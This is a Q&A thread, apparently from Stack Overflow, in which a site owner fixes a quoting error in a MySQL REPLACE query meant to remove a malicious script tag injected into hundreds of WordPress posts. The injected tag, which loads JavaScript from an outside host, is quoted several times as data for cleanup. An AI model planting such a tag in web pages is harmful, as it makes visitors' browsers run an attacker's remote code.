# Why do I receive an error in SQL when trying to find and replace javascript within a database

Tags: mysql, sql

I'm trying to run a find and replace in phpMyAdmin because stupid hackers have inserted a db in a website I designed. I'm looking for this specific string of texts that appears in 600+ different posts:

```
<script src='https://hotopponents.site/site.js' type='text/javascript'></script>
```

I keep getting this error:

> ERROR: Unknown Punctuation String @ 67

This is the SQL Query find and replace is trying to run;

```
SELECT `post_content`, REPLACE(`post_content`, '<script src='https://hotopponents.site/site.js' type='text/javascript'></script>', ''), COUNT(*) FROM `db709131568`.`wp_posts` WHERE `post_content` LIKE '%<script src='https://hotopponents.site/site.js' type='text/javascript'></script>%' COLLATE utf8_bin GROUP BY `post_content` ORDER BY `post_content` ASC
```

Whats can I do besides manually edit 600+ individual strings of content?

Comment: escaping those quotes might help, '<script src=' counts as an argument thats why its giving errors. and... if I may ask, are you writing you own queries to add database items even with wordpress?

Answer (score 1):

You need to escape the single quotes by doubling them.

```
SELECT `post_content`, REPLACE(`post_content`, '<script src=''https://hotopponents.site/site.js'' type=''text/javascript''></script>', ''), COUNT(*) FROM `db709131568`.`wp_posts` WHERE `post_content` LIKE '%<script src=''https://hotopponents.site/site.js'' type=''text/javascript''></script>%' COLLATE utf8_bin GROUP BY `post_content` ORDER BY `post_content` ASC
```

(Speaking of escapes, you might also consider using HTML escapes when displaying user entered content.)

Answer (score 0):

since you're using phpmyadmin, go to the search tab > find and replace

- Enter the full `<script src='https://hotopponents.site/site.js' type='text/javascript'></script>` as is, select the column and check 'Use regular expression'